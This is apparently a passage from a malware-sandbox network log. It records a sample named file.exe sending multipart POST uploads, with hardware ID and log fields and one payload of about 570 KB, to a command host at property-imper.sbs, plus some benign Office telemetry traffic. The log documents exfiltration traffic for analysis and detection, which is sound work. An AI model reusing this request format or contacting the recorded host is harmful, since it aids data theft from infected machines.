                                                                                                                                                                                                Data Ascii: --3OB78JD93PBLOD3Q0Content-Disposition: form-data; name="hwid"882D6AE6AFC8008FD7CBBD6DF28D3732--3OB78JD93PBLOD3Q0Content-Disposition: form-data; name="pid"3--3OB78JD93PBLOD3Q0Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                                                                                2024-11-24 02:04:17 UTC5236OUTData Raw: 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
                                                                                                                                                                                                2024-11-24 02:04:18 UTC1027INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:17 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=18i4pcsb8o9s7qs2929vm2op86; expires=Wed, 19-Mar-2025 19:50:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yjl%2Fu%2FNRXW%2B1NfuglB2tMelwvmwIkbj0mGZK2vNf3%2FmuXAIbEW%2Fr887lgknk2o0GhmkITc1y8HnPVVIRCczFl0yPCcQThGm9vDai8Ehl6cOatYBqE6H45bZ2mgy%2BMGC%2F4KYzI%2Fo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e75d3d0a9c48ce9-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2073&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21530&delivery_rate=1594756&cwnd=252&unsent_bytes=0&cid=da23523c3771a183&ts=890&x=0"
                                                                                                                                                                                                2024-11-24 02:04:18 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                2024-11-24 02:04:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                5192.168.2.549709104.21.33.1164432608C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:19 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=CDHIRW41UMXQOYH9K
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 1237
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-24 02:04:19 UTC1237OUTData Raw: 2d 2d 43 44 48 49 52 57 34 31 55 4d 58 51 4f 59 48 39 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 32 44 36 41 45 36 41 46 43 38 30 30 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 43 44 48 49 52 57 34 31 55 4d 58 51 4f 59 48 39 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 44 48 49 52 57 34 31 55 4d 58 51 4f 59 48 39 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                                                                                Data Ascii: --CDHIRW41UMXQOYH9KContent-Disposition: form-data; name="hwid"882D6AE6AFC8008FD7CBBD6DF28D3732--CDHIRW41UMXQOYH9KContent-Disposition: form-data; name="pid"1--CDHIRW41UMXQOYH9KContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                                                                                2024-11-24 02:04:20 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:20 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=n1r76a25900a02ecdffgei7m6f; expires=Wed, 19-Mar-2025 19:50:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVexVZ57ZfTUmMmVS%2FALjDDXNn2CXX9ChRGVQJ2UGsLPt1H1q%2BxrmieBhuXiK9JBItlKyrVWfnmUW%2BklqzxIjtxeyrcbTWO7WMKDjmyS3dip6WCLo6BDHvxg4NQz%2F%2F8i7YnEhsM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e75d3e1ac429e04-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1834&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2155&delivery_rate=1545791&cwnd=234&unsent_bytes=0&cid=2b20d6e27ca46e97&ts=734&x=0"
                                                                                                                                                                                                2024-11-24 02:04:20 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                2024-11-24 02:04:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                6192.168.2.549710104.21.33.1164432608C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:22 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=SOCCTL0NPQNPYZGT0V
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 570135
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-24 02:04:22 UTC15331OUTData Raw: 2d 2d 53 4f 43 43 54 4c 30 4e 50 51 4e 50 59 5a 47 54 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 32 44 36 41 45 36 41 46 43 38 30 30 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 53 4f 43 43 54 4c 30 4e 50 51 4e 50 59 5a 47 54 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 4f 43 43 54 4c 30 4e 50 51 4e 50 59 5a 47 54 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                                Data Ascii: --SOCCTL0NPQNPYZGT0VContent-Disposition: form-data; name="hwid"882D6AE6AFC8008FD7CBBD6DF28D3732--SOCCTL0NPQNPYZGT0VContent-Disposition: form-data; name="pid"1--SOCCTL0NPQNPYZGT0VContent-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                                2024-11-24 02:04:22 UTC15331OUTData Raw: b2 a0 ba 02 df fd 84 fe c0 02 4d 72 02 68 56 18 b8 0c 02 7f 95 56 0c 22 c1 0b 7b a9 da d9 56 62 75 ed ad 19 8b 74 7f de df 2f 04 c1 c7 df 95 e5 af d4 60 9c 87 07 f5 bc 25 7f c6 f8 7f 21 35 e9 cb 9e 9d 08 93 d2 fe 97 df fd 47 aa fd bc 7e b9 3f f7 e7 07 7a 55 78 20 bb 22 4d 77 16 5d 61 25 17 59 8d 3b ff 03 28 4d 8f ff df ed 26 ff f7 01 1e a2 03 70 66 8a 02 ad 04 42 bf 21 2c d8 f8 a0 7d 34 a3 26 13 14 c6 3b 89 5e 68 e8 b7 0b c9 7e cc fd 19 23 84 f4 a7 b2 5e a7 ed 08 00 a9 46 5a 30 3c 3e d8 0b 76 c6 40 8f bd 21 7d 57 f6 9e 9e e6 60 8c 3b ad 51 1e 77 7c d5 59 0e 75 b9 c2 b9 63 b7 6d de 02 6a 89 94 80 70 fb a8 44 61 a6 af 79 ec a1 76 4e 24 1d 9d c4 f5 ba 97 22 7a 84 73 bd 1d 05 81 df af 4c 27 f7 d3 1a a7 4f d1 b9 3d 3f a8 a1 ba 7d de c4 85 4d 9a e8 b9 31 b1 03
                                                                                                                                                                                                Data Ascii: MrhVV"{Vbut/`%!5G~?zUx "Mw]a%Y;(M&pfB!,}4&;^h~#^FZ0<>v@!}W`;Qw|YucmjpDayvN$"zsL'O=?}M1
                                                                                                                                                                                                2024-11-24 02:04:22 UTC15331OUTData Raw: f2 46 b6 a7 33 97 ff d4 2d 58 b5 76 89 c2 5e b0 df 45 0a b0 10 00 77 a8 ea e1 f2 68 80 0f 31 e1 d1 4a bc 46 8e e8 5e 86 a7 d8 5c fb 48 e2 cf 94 2a 1b 51 99 79 1d ea 9c d5 08 36 47 71 d9 df 68 3b 37 84 3a 6f e8 87 a0 ef 12 7c 52 1d 2b d5 b0 f0 cb 88 f1 cc be 24 3c fb 79 85 bf 85 36 48 2b 0d b3 44 d0 f2 0a 11 80 ad 87 dd 19 14 66 3d 00 74 2b 83 ff 4d b2 73 c0 d2 0f 90 59 08 72 bf a4 1c 3c db 44 11 e4 ba 3d c9 ff 6f df 76 f9 54 f1 64 73 05 48 00 48 22 ef f9 dc e7 89 03 91 5d 1a 32 28 48 80 f5 41 5c 74 52 a4 03 38 ef 84 b3 14 47 a4 1d a0 43 a1 17 c0 c0 e3 6a a6 47 b1 45 c1 ab e6 fc 4b a7 ee cd c3 2e 18 ac c9 b6 dd 95 dd 57 10 37 d4 65 c0 03 cc d2 bd d1 c2 34 87 6c 54 b7 19 1c 13 34 1b 91 9e 32 a4 ed a8 62 2c e3 a3 de 7c 57 4d e8 38 5e e2 23 6e 08 1e 7c 98 89
                                                                                                                                                                                                Data Ascii: F3-Xv^Ewh1JF^\H*Qy6Gqh;7:o|R+$<y6H+Df=t+MsYr<D=ovTdsHH"]2(HA\tR8GCjGEK.W7e4lT42b,|WM8^#n|
                                                                                                                                                                                                2024-11-24 02:04:22 UTC15331OUTData Raw: 96 0e 21 3c f6 1e 91 71 ed df 65 a0 6e 3b 87 8f 7c 54 5e cf 72 49 88 ff a5 81 d4 f0 19 44 c7 28 74 67 68 98 ad fe 92 b7 e3 25 5c 99 48 9d 48 b3 ac 51 4f 09 77 e9 74 1d bb b4 95 ec 2b d2 8e d1 f8 d3 87 25 76 73 3c 15 c4 8e a4 a6 b1 3c 6a 77 a7 7b 38 3b 45 ec 10 d9 b4 50 41 be aa 15 b9 7a 86 ae 8a da b1 27 35 31 59 9d 35 31 33 5f cd ca 64 90 27 1a d2 ff e2 c2 87 50 fd 89 df b6 ec 07 19 e9 32 e1 97 cb 04 ea 2b b7 98 eb 23 63 31 33 fc d4 76 c2 d7 86 b3 5f 37 3b be 68 ec bb 25 49 4b 5d 7a 95 96 1e 62 86 40 40 50 4c ac 4c 81 0d e2 c2 b5 05 14 39 0c 82 98 32 e0 2a 56 57 12 22 6a 69 14 a8 3f 34 b9 7e 7e d4 74 cf 51 d0 cb 8f 51 4d e5 98 e7 83 0c 0a f5 f2 0f d3 8a f0 af fa 39 a5 7f fa 1a ea dc fe 20 0f ba ea b0 1f d6 b3 9e ed 79 2f 06 2c af 00 4b 4c d9 47 40 95 5c
                                                                                                                                                                                                Data Ascii: !<qen;|T^rID(tgh%\HHQOwt+%vs<<jw{8;EPAz'51Y513_d'P2+#c13v_7;h%IK]zb@@PLL92*VW"ji?4~~tQQM9 y/,KLG@\
                                                                                                                                                                                                2024-11-24 02:04:22 UTC15331OUTData Raw: 11 cc 41 01 1e 14 74 8a 8f 7a bd 01 89 8b 78 03 c1 76 44 d5 67 29 72 66 48 5c 57 ab 2d 17 e0 e1 94 99 83 e4 9c 2a a9 5e de 35 76 90 02 1d 45 d1 fd f0 2a 21 1e 2f c3 57 92 87 af 33 a4 09 74 dd cc f7 67 46 5f 8d 36 63 c2 0a 6f ab 5c 7c 54 12 f1 19 ad 3b 39 8b cc 29 82 0b ff e0 43 a0 cb dd 3c 54 6c 6b 46 95 80 20 34 86 29 47 47 a0 c8 aa 88 9f 37 0b cc 03 8e 97 9c d6 68 0e f1 5b 8f b6 27 b7 da 74 7f 81 08 e8 fb e2 a0 e3 57 f6 1a 50 8e a6 dc 6b 75 75 a2 ad 74 ea 6a b8 6d f5 4d ab 3b 2b 98 a4 d7 e1 5b 78 a3 74 65 60 ab e2 5f 0a 61 40 20 17 b4 6b 83 81 e2 07 5d 33 dc 4d 0a ce 0a 40 7e 74 64 d0 46 e1 7b 0b 47 e9 d0 9b 7a ab 81 70 cf bf 93 19 f6 85 96 fc 1c 3b 70 fd 34 01 8b 76 5d e1 86 14 1c 48 80 14 8b 10 e1 47 ec fc dc 8f c1 60 6e c2 b5 05 75 68 29 2c 34 32 32
                                                                                                                                                                                                Data Ascii: AtzxvDg)rfH\W-*^5vE*!/W3tgF_6co\|T;9)C<TlkF 4)GG7h['tWPkuutjmM;+[xte`_a@ k]3M@~tdF{Gzp;p4v]HG`nuh),422
                                                                                                                                                                                                2024-11-24 02:04:22 UTC15331OUTData Raw: 9f fb 29 7f 0a 65 06 bc 9d a3 82 af 3d 1a d5 18 20 71 f0 09 43 72 cd 5a 7f 9b 91 5d 02 71 94 f3 2c 35 ce 47 9a f1 ad 6d d4 d6 d4 2c b5 05 b5 4c b3 73 82 97 d2 a3 d2 05 26 1f 31 7e 56 23 fa ff 2c a5 2f a6 d2 ca 35 de 51 25 b4 94 6d eb 91 6d 56 67 a4 a2 e8 1a 25 f1 2b 8e fe b8 65 c5 3e d1 ca 4a 31 5b 69 20 21 5b 44 24 59 fa ed c4 d7 8f 85 2d bc 92 9f 8a 61 c0 ae d5 bc f5 ed 5e fa 2d ee 0b c7 c6 da 30 c6 f4 d6 b7 4a 78 1a d7 a1 0f 3b 71 3c 94 59 55 12 0f e5 ef ab 92 f8 1a 22 be b3 3f ff 29 54 67 ec 8c ab 7b df 4b f0 25 1d f5 dd ea 76 73 4e 93 7c b8 26 89 62 fc dd b2 f0 2d b8 62 cb 6e 83 99 63 19 22 3e 12 77 09 5c 19 4e 44 7d 24 5f 38 3d 91 a9 8e 87 66 63 46 6d 73 6a a2 b8 ee 11 29 1c 8d f3 2c 73 08 21 64 e4 40 9e c2 66 dd 45 65 40 58 1b ec fa 79 cb 90 9d e1
                                                                                                                                                                                                Data Ascii: )e= qCrZ]q,5Gm,Ls&1~V#,/5Q%mmVg%+e>J1[i ![D$Y-a^-0Jx;q<YU"?)Tg{K%vsN|&b-bnc">w\ND}$_8=fcFmsj),s!d@fEe@Xy
                                                                                                                                                                                                2024-11-24 02:04:22 UTC15331OUTData Raw: 31 5a ed 53 6f df 34 d9 2c 99 a4 46 dd b4 78 b4 3a 3f 30 b3 ba 5d 5e b3 dd a7 9a c0 e8 e6 e6 33 44 3b ab 43 6e e0 80 59 b2 a1 a0 d8 0b 31 f0 23 2a 4b 25 6e 80 a1 05 22 a6 f6 96 9f c5 81 1d 22 28 d9 c0 ab 2d d9 c7 4d 65 ed e9 33 26 a4 bb 01 b6 95 ab d9 cb 79 fa 59 dc 15 d7 ed 97 97 21 b0 3e fb 37 ef ec 5f 44 a0 63 80 64 08 9d ee e4 9e 87 a3 09 9c c5 c7 b3 ed c4 93 23 a7 e7 28 9a b8 db 4b 6b e1 9d 92 17 ce 38 df cf b1 c0 8b 54 2e 2d df 0c e0 e7 dc 95 bb 2d 73 4c c8 ea cb 45 ad 65 67 ee d5 47 8d 9e 3a a3 9b c9 a1 83 3d 23 e8 42 eb 0b be b5 36 b9 e3 5b f2 0f 7a 16 3e 42 48 f1 1a 40 b1 c6 d7 7e 84 ec c7 c6 5a ea 34 30 0c ed 5a 01 db d0 59 e4 7f 97 20 c6 bb ec 5c 76 a4 8a 34 3c 96 d1 84 fb 1f e8 62 02 26 7e a4 e6 8c 13 7c 07 64 05 83 4b bb 91 80 20 da 1c b4 35
                                                                                                                                                                                                Data Ascii: 1ZSo4,Fx:?0]^3D;CnY1#*K%n""(-Me3&yY!>7_Dcd#(Kk8T.--sLEegG:=#B6[z>BH@~Z40ZY \v4<b&~|dK 5
                                                                                                                                                                                                2024-11-24 02:04:22 UTC15331OUTData Raw: 81 a1 9b fb 33 79 0b f0 69 cf 3f 43 f2 96 bf 0b 13 99 68 58 00 c3 bf 28 83 ee 9a 98 9c 77 63 d9 0e c4 e8 2b 69 41 26 e2 7d a5 d3 e7 1b 5c 95 b3 e7 27 d2 4d 1c 14 2f 2b 3f d7 9f 57 eb 70 4b b0 ad 57 92 8f d0 bd 2c 9c c4 d3 84 fc 42 1b 09 db 5b 4e bb 4c 5a 26 8e 84 f7 e3 83 dc a1 ec ca 55 b5 f2 9f d8 e2 c7 91 63 f7 cd f4 23 78 a0 37 43 dd 23 23 aa f4 af 44 6e 66 50 e9 33 bf 3f 25 de df 22 33 54 83 de 48 92 e9 bd e2 82 dd bf 33 6d 25 de 9f 2e af a4 a7 08 92 7d 4e ff fe 73 37 04 04 3b fb f9 30 e0 91 72 e6 63 57 64 76 22 f5 f6 bc 26 bb 46 9c eb e9 5f f6 a4 ce bb e2 06 4f cb 61 f5 e8 2b 7d cb 63 a6 90 dd 71 77 fb eb dc 7f bf 57 3c 8e d2 e8 96 ac 13 84 f7 72 bc 19 2c 0c ee d6 aa 78 38 fe fc 56 76 98 71 a4 84 3e 6a b5 b6 16 69 33 e7 d6 7c 27 6f 2d 07 91 89 00 23
                                                                                                                                                                                                Data Ascii: 3yi?ChX(wc+iA&}\'M/+?WpKW,B[NLZ&Uc#x7C##DnfP3?%"3TH3m%.}Ns7;0rcWdv"&F_Oa+}cqwW<r,x8Vvq>ji3|'o-#
                                                                                                                                                                                                2024-11-24 02:04:22 UTC15331OUTData Raw: bb 8b 90 76 1d bc e6 61 dd 10 eb a3 6b 7d 37 36 6b 34 f3 f8 03 5d 8f af 36 da c6 8e 32 1e 28 ca b7 d5 10 3d c6 0e e3 a2 55 bb 00 77 72 3e ea 24 1e 2e ba dd 31 57 cf b6 70 cf 4e c4 1d d8 29 8f 30 5f 61 5e e3 41 54 15 b2 f2 e5 cf 71 d2 48 29 84 c4 71 e1 2f e3 74 fd 13 c7 45 34 1c 61 d9 b9 ab 63 b6 11 84 d1 5a 01 ee 2d 60 f3 d5 58 02 20 38 6f 46 ad d1 16 04 d8 c5 5b 24 fb 78 e4 ef b5 93 b6 d9 e8 98 b5 70 3b b3 fa bb 18 4a da 06 26 66 7c 48 17 a3 d5 8a 48 48 22 b6 32 91 2c e4 ec cf bf 71 f2 c3 7c 1f bf 93 8f c7 46 99 51 98 cf c4 19 e7 b0 79 84 e2 b2 ad 44 e5 a5 af 93 9a ed 8d ab 8a 3a af 76 50 51 11 b7 a5 08 7d e1 ef 0e e3 3d 01 ec 2f 72 e8 68 2b 73 4a bf ed 67 2b e9 c9 2e 99 fb e6 2a 93 e7 7a 72 c9 1d 95 9c 8f c7 74 69 24 df 2d d1 cd 37 07 3a 14 f5 94 f0 89
                                                                                                                                                                                                Data Ascii: vak}76k4]62(=Uwr>$.1WpN)0_a^ATqH)q/tE4acZ-`X 8oF[$xp;J&f|HHH"2,q|FQyD:vPQ}=/rh+sJg+.*zrti$-7:
                                                                                                                                                                                                2024-11-24 02:04:22 UTC15331OUTData Raw: 05 b8 86 56 47 e7 e4 c7 ad 5c 84 fe 77 dc 22 af cc fa 88 c7 bf bd b5 fe 6d 73 e9 e7 2e c0 5b 6d 02 90 b0 00 f3 ce 3d ee c5 01 8b d9 54 46 91 e8 70 d6 05 b3 17 f5 80 5a 92 44 ad 16 03 37 76 da e5 d4 7b 79 35 f0 8c c9 0e 5d 0c 78 de 29 26 9f 53 3d cd 71 7b d2 5c 7c 84 73 e3 7b ac 14 bc 97 75 20 35 46 02 e0 3b 70 0c 1c 01 df 8d 82 65 b7 be 68 7f 69 e1 65 3a d3 88 e8 72 67 8b 4b 16 28 58 37 b6 53 b8 25 4f f3 18 b0 b4 c8 6e a8 57 59 0b 49 6e 41 12 cb 51 aa 3d 6e 48 2d 65 a5 3e aa 3a 4b 55 5e e8 fe a2 0b 82 54 c9 01 5b 12 e0 c3 ba 99 a0 a1 cc d4 ab 62 be 3c cc 62 e6 f1 e8 8d 53 6f b0 57 86 1a d0 ba 5b f4 90 fe 1e 93 fc 73 25 9a 49 70 84 14 e8 6d c0 03 62 3e 40 89 57 1f a0 2b d1 94 92 4d 14 6f 6a 33 f7 46 19 09 82 55 7b b7 7a 3b 24 4b 70 8b 42 6c 30 36 0f df b1
                                                                                                                                                                                                Data Ascii: VG\w"ms.[m=TFpZD7v{y5]x)&S=q{\|s{u 5F;pehie:rgK(X7S%OnWYInAQ=nH-e>:KU^T[b<bSoW[s%Ipmb>@W+Moj3FU{z;$KpBl06
                                                                                                                                                                                                2024-11-24 02:04:26 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:26 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=pbn3bn2kducrch7n2vvqdjhcf7; expires=Wed, 19-Mar-2025 19:51:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OEak4oOvu4XrECa7q1g7xWHOnz8Z1U4aHg91gjsPJb7UH9v5hmNqd4Ujqle5uB9PSsCfK5iEStajBXBPXlAre1fDcbDuKun7R7jK5CbeJu7WmO71OLkB54nfZYLVl5eHEg%2Bueo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e75d3f41f120c7c-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1684&sent=283&recv=597&lost=0&retrans=0&sent_bytes=2846&recv_bytes=572684&delivery_rate=1235194&cwnd=129&unsent_bytes=0&cid=88d51566e64c0a24&ts=3519&x=0"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                7192.168.2.54971313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:24 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-24 02:04:25 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:24 GMT
                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                Content-Length: 218853
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public
                                                                                                                                                                                                Last-Modified: Fri, 22 Nov 2024 01:49:48 GMT
                                                                                                                                                                                                ETag: "0x8DD0A97F285E80B"
                                                                                                                                                                                                x-ms-request-id: 91a9dc6d-001e-0028-4620-3dc49f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241124T020424Z-174c587ffdfldtt2hC1TEBwv9c00000003k000000000h1kc
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:25 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
